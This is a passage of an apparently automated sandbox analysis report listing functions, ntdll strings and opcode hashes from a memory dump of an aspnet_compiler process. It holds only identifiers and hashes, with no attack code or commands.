                                                              Function 01A1273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 01A521D9, 01A522B1
                                                              • SXS: %s() passed the empty activation context, xrefs: 01A521DE
                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 01A522B6
                                                              • .Local, xrefs: 01A128D8
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                              • API String ID: 0-1239276146
                                                              • Opcode ID: 74d0f32a7266f1808877942744bc1357f76ae49a82a1eb45083ac6983071b8f1
                                                              • Instruction ID: ce8955312f89e69f6fc27bfe56c537cbf17b44c8489815e4bcf6ef72dfb6c4e1
                                                              • Opcode Fuzzy Hash: 74d0f32a7266f1808877942744bc1357f76ae49a82a1eb45083ac6983071b8f1
                                                              • Instruction Fuzzy Hash: 74A1AC35A0022ADFDB25CF68D884BA9B7B1BF58354F2541EAD948EB255D730DE80CF90
                                                              Function 01A14AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • SXS: %s() called with invalid flags 0x%08lx, xrefs: 01A5342A
                                                              • RtlDeactivateActivationContext, xrefs: 01A53425, 01A53432, 01A53451
                                                              • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01A53456
                                                              • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01A53437
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                              • API String ID: 0-1245972979
                                                              • Opcode ID: 74b3d7f1ec39988442af5f76b8ec5858d4a11ed83f19191c68a2b0c8e71a4ffc
                                                              • Instruction ID: aabee70389bd430fdcab683f04b980e6dbb72ff323631c6c563b9485a265aeae
                                                              • Opcode Fuzzy Hash: 74b3d7f1ec39988442af5f76b8ec5858d4a11ed83f19191c68a2b0c8e71a4ffc
                                                              • Instruction Fuzzy Hash: 116112366087129BDB22CF1DC841B2ABBF5BFC4B91F19852DE9999B245C734E801CB91
                                                              Function 019E64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01A41028
                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01A40FE5
                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01A410AE
                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01A4106B
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                              • API String ID: 0-1468400865
                                                              • Opcode ID: 54a6ed479953c500e0360c1d38fa560e790276d3609f067df9b28c217ce5f122
                                                              • Instruction ID: c052aa127dc51381513a9214c7a2f23b69e825dc5db2feaf8f7bd6d78b64c97a
                                                              • Opcode Fuzzy Hash: 54a6ed479953c500e0360c1d38fa560e790276d3609f067df9b28c217ce5f122
                                                              • Instruction Fuzzy Hash: BA71C1B1A043159FCB21DF18C988F9B7FE8AFA4764F400868F9498B146D734D588CBD2
                                                              Function 01A0245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • apphelp.dll, xrefs: 01A02462
                                                              • LdrpDynamicShimModule, xrefs: 01A4A998
                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 01A4A992
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01A4A9A2
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-176724104
                                                              • Opcode ID: 57e05854db4adecc81e9d691009d08bdeaf402b0ed66f48ab536e32f33bdbb7e
                                                              • Instruction ID: 3dc956b662187021fb2d9e48cb0f5b25ae073bb8f5d709908db317c54e7ee35a
                                                              • Opcode Fuzzy Hash: 57e05854db4adecc81e9d691009d08bdeaf402b0ed66f48ab536e32f33bdbb7e
                                                              • Instruction Fuzzy Hash: E3314AB9A80701EBDB32DF5DD945A6E77B4FFC4B00F16001AE907A7246C7705942C781
                                                              Function 019F29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • HEAP[%wZ]: , xrefs: 019F3255
                                                              • HEAP: , xrefs: 019F3264
                                                              • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 019F327D
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                              • API String ID: 0-617086771
                                                              • Opcode ID: 3d8f6e476cf83b7c9ac7c2f9fb9ccd82780915c7a4e85f9b44fb40571dcccacf
                                                              • Instruction ID: 9f662f61e6c25079d45341637a8957764fe412e8ab9014ab0d6415dcbf0e17f1
                                                              • Opcode Fuzzy Hash: 3d8f6e476cf83b7c9ac7c2f9fb9ccd82780915c7a4e85f9b44fb40571dcccacf
                                                              • Instruction Fuzzy Hash: 8292CE70A04249AFDB25CF68C444BAEBBF5FF48310F18849DEA59AB391D738A945CF50
                                                              Function 019F0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-4253913091
                                                              • Opcode ID: c55c94c204d7422f4e4d64c7ba4efd93074b837e1fd2322b2485bff6f4d7d0ab
                                                              • Instruction ID: 1928a8ed3d2b00cf27a636c5f75ee7644d721dfff113a0ea29da8ec362cf869c
                                                              • Opcode Fuzzy Hash: c55c94c204d7422f4e4d64c7ba4efd93074b837e1fd2322b2485bff6f4d7d0ab
                                                              • Instruction Fuzzy Hash: 60F19F34A00606EFEB15CF68C984F6AB7BAFF84304F18455DE61A9B352D734E981CB91
                                                              Function 01A06962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $@
                                                              • API String ID: 0-1077428164
                                                              • Opcode ID: 792a0bc31be6864369b519131859fffdd342f1bff38c05ba3f3ce8584f7ac5e9
                                                              • Instruction ID: e3fe7782ef686e3b6619c1b0711203864cf0e042bd6e3e744597b68a2e619b09
                                                              • Opcode Fuzzy Hash: 792a0bc31be6864369b519131859fffdd342f1bff38c05ba3f3ce8584f7ac5e9
                                                              • Instruction Fuzzy Hash: 06C27071A093419FE726CF68D840BABBBE5AFC8754F04892DE9C9C7281D734E845CB52
                                                              Function 019DA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                              • API String ID: 0-2779062949
                                                              • Opcode ID: 9f1a430bb386716f26ff7652420e610e60fb8377574ba4637c02cc86cd747bb9
                                                              • Instruction ID: a85c4d2b021b75bb3faf854defdcd49b176d00d661b4f8519a505343da340536
                                                              • Opcode Fuzzy Hash: 9f1a430bb386716f26ff7652420e610e60fb8377574ba4637c02cc86cd747bb9
                                                              • Instruction Fuzzy Hash: B9A18C759112299BDB31DF68CC88BEAB7B8EF84710F1041EAEA0DA7251D7359E84CF50
                                                              Function 01A00BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • Failed to allocated memory for shimmed module list, xrefs: 01A4A10F
                                                              • LdrpCheckModule, xrefs: 01A4A117
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01A4A121
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-161242083
                                                              • Opcode ID: a030d060e53bf86eed5e1dd3788968542520af5a6adf321b7e3c5af85ff6db0e
                                                              • Instruction ID: 2a622ce6c386acda95e8ba02ffd1a68de9e9911b45e69b5082f916b298e23065
                                                              • Opcode Fuzzy Hash: a030d060e53bf86eed5e1dd3788968542520af5a6adf321b7e3c5af85ff6db0e
                                                              • Instruction Fuzzy Hash: 5671C074A006059FDB26DF6CDA81BBEB7F4FB88744F18402DE50AE7251E734A942CB50
                                                              Function 019F0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-1334570610
                                                              • Opcode ID: 424a0df9c0e9732f428287da04d008897d4b7eb7f290b7dd891783904250ab81
                                                              • Instruction ID: 499b961fa3c8aaa2db5c502d7beabb93294443063fd9c06853b599b1dd886627
                                                              • Opcode Fuzzy Hash: 424a0df9c0e9732f428287da04d008897d4b7eb7f290b7dd891783904250ab81
                                                              • Instruction Fuzzy Hash: AD61E170A00305EFDB29CF28C544B6ABBEAFF85305F18855DE5598F286C770E841CB90
                                                              Function 01A1C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • Failed to reallocate the system dirs string !, xrefs: 01A582D7
                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 01A582DE
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01A582E8
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-1783798831
                                                              • Opcode ID: d5b970cf7aa751cf610f734eb0b0a651e4feeded188a253d67d318fa0c92046c
                                                              • Instruction ID: c42ba43b54e29dedb25848cbb5e20003f9fc7fface5faa9f48428b532ed3e51f
                                                              • Opcode Fuzzy Hash: d5b970cf7aa751cf610f734eb0b0a651e4feeded188a253d67d318fa0c92046c
                                                              • Instruction Fuzzy Hash: BB413475545701ABD721EB68DD44B5B7BE8FF88B60F00482EF949D3298E7B4D801CB91
                                                              Function 01A9C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • @, xrefs: 01A9C1F1
                                                              • PreferredUILanguages, xrefs: 01A9C212
                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 01A9C1C5
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                              • API String ID: 0-2968386058
                                                              • Opcode ID: a7a4de6a46fc1a004c20004e8e5c23751e166f792279a1e9e6ebf80515437823
                                                              • Instruction ID: 4c56a1711b4ba4a640df379ca38429a146576fea08d0b4f818bc66fedc67c9ae
                                                              • Opcode Fuzzy Hash: a7a4de6a46fc1a004c20004e8e5c23751e166f792279a1e9e6ebf80515437823
                                                              • Instruction Fuzzy Hash: F9418371E00619FBDF11EBD8C991FEEBBF8AB54710F1440AAE609B7284D7749A84CB50
                                                              Function 01A74144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                              • API String ID: 0-1373925480
                                                              • Opcode ID: c439424297b84e7817556116f38f06e6c0ab23eaa76b2c5ac2f8c9ad72a01383
                                                              • Instruction ID: 71bf8d1764c7be3c04f6d04bd2fe59d1dcdf10dd3008c11f5c69a9341980b3e0
                                                              • Opcode Fuzzy Hash: c439424297b84e7817556116f38f06e6c0ab23eaa76b2c5ac2f8c9ad72a01383
                                                              • Instruction Fuzzy Hash: 80412572A047498FEB26DBD9DC40BADBBB8FF99340F18045AD905EB791D7348A01CB51
                                                              Function 01A64755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • LdrpCheckRedirection, xrefs: 01A6488F
                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01A64888
                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01A64899
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                              • API String ID: 0-3154609507
                                                              • Opcode ID: 43cca8f5bf927d4864d665872ac90e315aac23f8de62056a6e54f9c780b954f4
                                                              • Instruction ID: 3140d1479d55e4c3075eca20379bcf9a077816cc8aa251064036d8cf3d852d12
                                                              • Opcode Fuzzy Hash: 43cca8f5bf927d4864d665872ac90e315aac23f8de62056a6e54f9c780b954f4
                                                              • Instruction Fuzzy Hash: B741CF32A057519FCB22CF68D940A66BBECFF8EA50B0A0669ED49D7251D730E800CB91
                                                              Function 019F0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-2558761708
                                                              • Opcode ID: 01014fda5b9c84a872af9b60a50e34a052f76957cc2a3c15cc5e32fa2141429b
                                                              • Instruction ID: 6cde79e474647ff08212aaec63e933a266dca4017b258df189a6f33e557fbd1a
                                                              • Opcode Fuzzy Hash: 01014fda5b9c84a872af9b60a50e34a052f76957cc2a3c15cc5e32fa2141429b
                                                              • Instruction Fuzzy Hash: C411CD31716146AFEB29CB18C480B6AB3AAAF8162AF19811DF50ACF252DB30E841C750
                                                              Function 01A620DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • LdrpInitializationFailure, xrefs: 01A620FA
                                                              • Process initialization failed with status 0x%08lx, xrefs: 01A620F3
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 01A62104
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-2986994758
                                                              • Opcode ID: 738fe41110167472482141ce4b4ae194381cc86226df9b1df1a8d178bdaf186c
                                                              • Instruction ID: d08c68a4ad1476670356f9ed2c0802ef688a51ffa3ac005ec4efe588bebe998c
                                                              • Opcode Fuzzy Hash: 738fe41110167472482141ce4b4ae194381cc86226df9b1df1a8d178bdaf186c
                                                              • Instruction Fuzzy Hash: 08F02278640708ABEB24E70CCD46F9A3B7CEB80F04F100029FB4477281D2F0A900CA82
                                                              Function 019F03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: #%u
                                                              • API String ID: 48624451-232158463
                                                              • Opcode ID: dbffcfca558e3c22ce1de84d477125c48c5f4723f796f44fff10b763c921b25a
                                                              • Instruction ID: 116ebb6ec6ca9488bf261eb8bda1d6b8f8f98ed4d26c21ec1ddd38868a5f0bc2
                                                              • Opcode Fuzzy Hash: dbffcfca558e3c22ce1de84d477125c48c5f4723f796f44fff10b763c921b25a
                                                              • Instruction Fuzzy Hash: 9E713D71A0014AAFDB01DF99C990FAEB7F8FF58704F154069EA05E7251EA38EE45CB60
                                                              Function 019EA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • LdrResSearchResource Exit, xrefs: 019EAA25
                                                              • LdrResSearchResource Enter, xrefs: 019EAA13
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                              • API String ID: 0-4066393604
                                                              • Opcode ID: 6209d3c88cf36308f19cdc9a697b97b5f898366af521932363762ffb01581e8d
                                                              • Instruction ID: a6cc4b27f38ad7d05c4c56824cc40b5e8858979d083682b6acbeaca7cad58c4a
                                                              • Opcode Fuzzy Hash: 6209d3c88cf36308f19cdc9a697b97b5f898366af521932363762ffb01581e8d
                                                              • Instruction Fuzzy Hash: 9BE16171E00319AFEF22CF99D984BAEBBBABF98310F144526F905E7261D7749940CB50
                                                              Function 01AAA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: `$`
                                                              • API String ID: 0-197956300
                                                              • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                              • Instruction ID: e5fe53fc57322e72315f0d36e5587ec00bbc7c0aaa329babe31dae4309bc569a
                                                              • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                              • Instruction Fuzzy Hash: 00C1C0312043429BEB25CF28C941B6BBBE5BFC4318F484A2DF696CB291D779D905CB91
                                                              Function 01A5E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: Legacy$UEFI
                                                              • API String ID: 2994545307-634100481
                                                              • Opcode ID: 0da407b1093e1899c362385a43adde932d133beb4a94b17404100b69ad6634b2
                                                              • Instruction ID: 40e5f1c4958c09d09e820f385dca471e5dbe5e2b07c2b6f000a9cf15f7ce82e6
                                                              • Opcode Fuzzy Hash: 0da407b1093e1899c362385a43adde932d133beb4a94b17404100b69ad6634b2
                                                              • Instruction Fuzzy Hash: B4613AB2E046199FDB55DFA8C940BADFBF5FB48700F14406DEA49EB251D731AA40CB50
                                                              Function 01A843D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$MUI
                                                              • API String ID: 0-17815947
                                                              • Opcode ID: 004f3da2bcde88be438558cc65baeb9675909073b877dd248f0c173fc935221c
                                                              • Instruction ID: 06dd6f589e5a442ca8607f32401de1f1d2885a9f283a4c8d2c546d218b55ae3e
                                                              • Opcode Fuzzy Hash: 004f3da2bcde88be438558cc65baeb9675909073b877dd248f0c173fc935221c
                                                              • Instruction Fuzzy Hash: D5510971D0021EAFEF11EFA9CD90BEEBBB9EB58754F10052AE615B7290D6309D05CB60
                                                              Function 019E04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 019E063D
                                                              • kLsE, xrefs: 019E0540
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                              • API String ID: 0-2547482624
                                                              • Opcode ID: b8b013ad5c56ddb253598f994272f3ee7b36384806fa5eeffe85753cf4e791d9
                                                              • Instruction ID: fb81039238f2ceb96cbf75db728fd1ef13ff88600c7be0ff4cdf1725494abb13
                                                              • Opcode Fuzzy Hash: b8b013ad5c56ddb253598f994272f3ee7b36384806fa5eeffe85753cf4e791d9
                                                              • Instruction Fuzzy Hash: 7451ED716007429BC726EF69C5487A3BBE8AF84700F18493EE69E87241E7B0D505CF91
                                                              Function 019EA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 019EA2FB
                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 019EA309
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                              • API String ID: 0-2876891731
                                                              • Opcode ID: 86112a5387f4656728c5c50e7e7d634057ca8b4c625d34ef986d053ddc85d41a
                                                              • Instruction ID: 4a7a0fbc69c9fb64ba960778c4bda008ca5c58f89025e93657b5ff23a58762a4
                                                              • Opcode Fuzzy Hash: 86112a5387f4656728c5c50e7e7d634057ca8b4c625d34ef986d053ddc85d41a
                                                              • Instruction Fuzzy Hash: 6E41BE30A04649DFEB16CF59D844B6EBBF4FF84700F1444AAE918DB2A1E3B5DA41CB50
                                                              Function 01A607C3 Relevance: 2.6, Strings: 2, Instructions: 114COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: O:z`$O:z`(
                                                              • API String ID: 0-1361314060
                                                              • Opcode ID: 6c584cc671affa1335d90af445fda3c017b08b63274fdd124d81e24adf0fd3e8
                                                              • Instruction ID: b250a2902889fd22c864175dcbe8d7add6345b96d313058d1285658791a9d282
                                                              • Opcode Fuzzy Hash: 6c584cc671affa1335d90af445fda3c017b08b63274fdd124d81e24adf0fd3e8
                                                              • Instruction Fuzzy Hash: 1D418B729083019FD361DF29C944B9BBBE8FF88664F004A2EF598C7291DB70D945CB92
                                                              Function 01A1A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_19b0000_aspnet_compiler.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: Cleanup Group$Threadpool!
                                                              • API String ID: 2994545307-4008356553
                                                              • Opcode ID: d2d9fa9d98954d1b6cb527cdfc0c46a2f1ad11df5f86b12b479be9b279a7f51c
                                                              • Instruction ID: d8dd8ec3dd2485961a308d773d5a6f9f0e13fbf5ccc54653a4224498d24dacaf
                                                              • Opcode Fuzzy Hash: d2d9fa9d98954d1b6cb527cdfc0c46a2f1ad11df5f86b12b479be9b279a7f51c
                                                              • Instruction Fuzzy Hash: 2101DCB2246B80AFE321DF24CE45B2677E8E794B25F058939E66CC7194E334E804CB46
                                                              Function 019EC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019B0000, based on PE: true
                                                              Joe Sandbox IDA Plugin
